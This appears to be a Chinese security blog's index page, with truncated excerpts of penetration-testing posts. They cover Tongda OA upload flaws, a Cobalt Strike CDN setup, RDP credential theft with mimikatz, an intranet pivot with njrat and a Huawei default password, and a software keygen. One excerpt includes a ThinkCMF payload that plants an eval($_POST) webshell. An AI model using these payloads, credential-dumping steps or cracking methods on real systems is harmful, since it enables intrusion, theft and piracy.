Sp4ce's Blog

学习审计通达OA时发现的一些有意思的事 全局变量覆盖审计时发现前辈们提到了这个问题，跟了下存在问题的文件 比如存在变量覆盖的文件是pda\vote\list.php， require_once "pda/auth.php";include_once "inc/conn.php";include_once "inc/utility_all.php";include_once "mobile/api/qyapp.vote.class.php";if ($P == "") { $P = $_COOKIE["PHPSESSID"];}else { $P = $_GET["P"];} 这里包含了inc/conn.php数据库连接文件 继续跟，发现包含了inc/td_config.php <?phpinclude_once "inc/common.inc.php";$ROOT_PATH ...

f6ae6e37cafa8b635e173b811b985f64cc4dc9d53b5e11c39587f78adc381a31db73c6dbba5d5a7c259f9a980eafd97d4dfe18c81555417cbbf70c5f3657ea8c7e189c96475afc18ca05d6405e0e335a463aad7e770fc9e51bcfe996bee94b8259008eb5b9bba38e566a75f8e0caf04adeb9f31f1993cb2924183c17241aa5fc403703f125504a25a6521ff8fffd49dee1e09bc703bf84f0845c8be7938b9f4761acf8b55189aac692aa04e97aa7c460293067faac7fb4827a197206aec814c73f13fb9903d7e24593482e7385702b723acca845431fb48155ca62bebdfb687030b37ad6cc207a0d2c457e749f5022c2bd7c039121228cdf3 ...

学习下CS通过CDN上线 所需 域名*1 CDN*1 VPS*1 部署域名购买后将DNS更改为CDN服务商的DNS服务器，然后等待生效 以CF为例，生效后会给邮箱发一封邮件 然后配置解析域名 CS配置文件 C2.profile ### # @Author : Sp4ce # @Date : 2020-07-15 11:59:42 # @LastEditors : Sp4ce # @LastEditTime : 2020-07-15 15:14:57 # @Description : Challenge Everything.### set sample_name "Etumbot";set sleeptime "2000";set jitter "0";set maxdns "255";set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trid ...

d85b19524ca0a6165d6a5d104b6e7f3540bbe833f7a46aa2c8385f2352a6b78191a33438805dbe118a73272245003888f1c78cbbde20bd8af3c881f883531bc2e0b8b49dbecae215cc2e7e2be5558c3e3429ded056ad1e93de5dd6edb59334dbcd1227be977e5577486286164f1ed34154fe58aa2094c02e2382c7449b1e2e33f05adf63418715a2e50267854edd247d5a9bf572bfdf0ba349d6be8e86180c244fe9b129d4bbd924ad07cad55d3f24e611e259a4a3a086fda56a8b038c170211ab662d634f65192568f9b208562df62c4a0234cfa3a971162996e7276ff8ae88c363bbb56e9b66484bae1ab72ab05832bfb313c052bd5b86b ...

通达OA官方于2020-03-13发布了安全更新，修复了任意文件上传（2013、2013adv、2015、2016、2017、V11）和文件包含（V11）漏洞，从官网下到源码解密后，简单看了下 直接看主流的2017、V11产品吧，这个系列产品有全版本的变量覆盖问题 V11、2017任意上传以2017为例 补丁文件路径：2020_A1\2017版\ispirit\im\upload.php 左侧为原始代码，右侧为补丁，可以看到直接将鉴权的文件从else里释放了出来，避免了第5行传入P值导致的权限绕过问题 继续往下看任意文件上传的问题 $TYPE = $_POST["TYPE"];//获取TYPE$DEST_UID = $_POST["DEST_UID"];//获取DEST_UID（接收方ID）$dataBack = array();if (($DEST_UID != "") && !td_verify_ids($ids)) { $dataBack = array("status" ...

做项目时发现一个站点为前后分离的架构，翻了下发现了map文件，采用restore-source-tree还原时报错，记录下解决过程 安装先从git克隆到本地 git clone https://github.com/laysent/restore-source-tree.git 然后进入文件夹 npm install 这里建议挂个代理、VPN，国内很慢 这里在win下会报错 λ npm cinstall npm WARN deprecated [email protected]: � Thanks for using Babel: we recommend using babel-preset-env now: please read https://bab ...

抽空研究了下ALV的注册机制，写了个注册机 分析ALV的注册方法是unlockCodeToolStripMenuItem_Click方法，当点击Unlock按钮时会触发注册事件并调用Class2类中的smethod_1、smethod_02个方法进行校验，详细流程见如下代码 unlockCodeToolStripMenuItem_Click方法 private void unlockCodeToolStripMenuItem_Click(object sender, EventArgs e) { string text = this.prefs_0.Key; if (!InputForm.smethod_3("Apache Logs Viewer | " + Class96.smethod_264(), Class96.smethod_143(), ref text)) { return; } if (text != null) { text = text.Trim(); } if (st ...

c1eaa03b761144d4b351aa8bd40bf7eb6cf248c937441009eef2d13e0b49b0ddd8f41f80c4819f78f66fbf9d0d42c1b42e93892e9631c73b0ab43677392f07637fe67c34bce60fa22292c451a4f8da0894d4424fd875617c575d58066488eca95c75256ba75f2b066b26dafd85390092c8b25e275be03fda676b9c45b92b7cbba662310b16f94b50d6404506a4d2b5984600f81223dec5dacbf03641bd817613fe3d81a3fdfff83c6c46b1f2e0a5b9fc9f10e7fe4f4e6ede39e9aea36596aab061f40d338f03940fb815b30e63cb64991adbbe89801abec5bdf17692d03b50a0950765671dbcf33f054bc88f2892e336b54b7f3c24e53b259 ...

拿下一台运维机，上了个CS，发现曾经连接过几台服务器并且保存了凭据，网上查了圈发现CS不支持交互式mimikatz，记录下获取远程主机RDP凭据。 Windows保存RDP凭据的目录是C:\Users\用户名\AppData\Local\Microsoft\Credentials 可通过命令行获取，执行: cmdkey /list或powerpick Get-ChildItem C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\ -Force注意:cmdkey /list命令务必在Session会话下执行，system下执行无结果。 使用cobalt strike中的mimikatz可以获取一部分接下来要用到的masterkey和pbData mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID 输出应类似 **BLOB** dwVersion : 00000001 - 1 ...

前一阵子接到个项目，目标站是thinkCMF2.X搭建的，试过网上很多方法无法拿下，本地搭了个环境测试了下，最终成功拿下 由于thinkcmf2.x使用了thinkphp3.x作为开发框架，默认情况下启用了报错日志并且开启了模板缓存，导致可以使用加载一个不存在的模板来将生成一句话的PHP代码写入data/runtime/Logs/Portal目录下的日志文件中，再次包含该日志文件即可在网站根目录下生成一句话木马m.php 日志文件格式为YY_MM_DD.log，如当前日期为2019年12月12日，日志文件为19_12_12.log，完整路径为data/runtime/Logs/Portal/19_12_12.log 测试成功的环境Linux 宝塔[PHP7.2] Windwos PHPstudy PHP7.1 Payload1：首先访问http://target.domain/?a=display&templateFile=%3C?php%20file_put_contents(%27m.php%27,%27%3C%3fphp+eval($_POST[%22X%22]) ...

记录下Cobalt Strike Teamserer的搭建 环境如下 Ubuntu 18.04 Cobalt Strike 3.14 准备一台Ubuntu 18.04的服务器，下载Cobalt Strike完整文件并传到服务器上 安装JDK1.8 apt install openjdk-8-jdk -y 装好后尝试执行./teamserver 10.16.11.55 cSro0t进行验证 启动成功 添加服务vi /etc/systemd/system/cobaltstrike.service [Unit]Description=CS ServiceAfter=network.targetWants=network.target[Service]Type=simplePIDFile=/run/CS.pidWorkingDirectory=/path_to_cobaltstrike_root_directory/ExecStart=/path_to_cobaltstrike_root_directory/teamserver YOUR_SERVER_IP YOUR_PAS ...

在对内网进行ms17-010扫描时，发现2台之前没有出现过且没有打补丁的主机，于是，尝试了一波 kali主机在扫描时发现2台之前没有出现过且没有打补丁的主机 尝试打了一波 然后种了个njrat 翻文件的时候发现了点配置文件 down下来解压后发现是交换机的配置文件，于是有了一个大胆的想法 查看了被控主机的网络连接后，发现一个地址无法ping通，TCP包也无法到达，推测做了ACL 于是在被控机上搭了earthworm做转发 本机执行ew -s rcsocks -l 本地代理端口 -e 远端连接端口 被控机执行ew -s rssocks -d 主控机IP -e 远端连接端口 然后开启proxifier的代理功能，成功访问了那个系统，但这不是主要目的 在咨询了好哥们后，他建议尝试搞搞交换机看看 在对10.2.66/24网段扫描后发现10.2.66.254开放了80和23端口，尝试xshell连接 成功使用huawei密码huawei@1234连接，继续翻上级路由 发现了10.2.20.1 继续telnet 继续翻 发现10.2.20.58 继续翻，翻到 ...